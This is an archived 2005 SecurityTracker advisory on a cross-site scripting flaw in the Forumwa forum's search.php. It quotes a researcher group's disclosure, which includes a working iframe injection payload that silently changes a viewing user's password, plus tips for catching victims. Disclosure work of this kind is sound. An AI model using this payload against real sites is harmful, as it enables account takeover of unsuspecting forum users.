SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Forumwa Vendors:   demof.com
Forumwa Input Validation Errors in 'search.php' Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013350
SecurityTracker URL:  http://securitytracker.com/id/1013350
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 2 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): v1
Description:   An input validation vulnerability was reported in Forumwa. A remote user can conduct cross-site scripting attacks.

The 'search.php' script does not properly validate user-supplied input in the search string. A remote user can supply specially crafted input that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Forumwa software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The body and subject of messages are also affected.

The vendor has been notified.

Raven from Hackerlounge Research Group reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Forumwa software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.demof.com/forumwa.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Forumwa search.php xss vulnerability




 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][] 
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
  
 Vulnerable: Forumwa_v1 (any version)  
  
 
 ---  
  
 General information:  
  
 Forumwa is a simple discussion forum, based on PHP 
and MYSQL. Beside the basic-features there are 
special functions like search function, user 
profiles, memberlist, mailer, feedback? 
Multilanguage, easy installation.  
  
  
 ---  
  
 Description:  
  
 The search.php script is vulnerable to a XSS attack 
by a remote attacker. The searched string is not 
filtered for any harmfull characters like < > and ". 
This makes it possible for an attacker to trick a 
user into going to a harmfull page and stealing a 
session.  
  
 Also, the body and the subject of a message posted 
on the forum are not checked for < or > characters. 
The combination of these two vulnerabilitys makes a 
real big problem.  
  
  
 ---  
  
 Proof Of Concept:  
  
 What this proof of concept will do is load a 1x1px 
IFrame from a message in the board that will abuse 
the search.php xss attack to change a viewers 
password to "wh00ters". How to use: make a post 
containing the following body and hope someone 
actually views the messages on the board. Once they 
open the link to view the post, their account is 
yours. Tip, make it a nice thread that people will 
reply to so you know who you compromised.  
  
 ---PoC Injection---  
  
 <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM 
DIRECTORY 
CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST 
URL CHANGEME!!!]/[FORUM DIRECTORY 
CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=u@mail.com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E
 
HEIGHT=1 WIDTH=1></iframe>  
  
 ---PoC Injection---  
  
 All that needs to be altered in this injection are 
the things between [ ] that says "CHANGEME!!!"  
  
  
 ---  
  
 Fix and Vendor status:  
  
Vendor has been notified; expect an official patch 
soon. 
  
 ---  
 
Greetz: 
 
All the people at hackerlounge.com, JWT, 
TGS-Security.com and JWT-Security.net. 
Specifically: 
 
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, 
Modzilla, Pingu, Jake Johnson, Afterburn, airo, 
cardiaC, chis, ComputerGeek, deep_phreeze, dudley, 
evasion, eXtacy, Mattewan, Afterburn, 
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, 
Slarty, NoUse, Snake (I hate you), Surreal (I hate 
you), -=Vanguard=-, The_IRS, puNKiey, driedice, 
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, 
voteforpedro, Cryptic_Override, kodaxx, 
~CreEpy~NoDquE~, Brainscan, the_exode, 
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and 
anyone else I forgot.  
 
 
--- 
 
Credit: 
 
HRG - Hackerlounge Research Group 
http://www.Hackerlounge.com 
 
  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][] 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC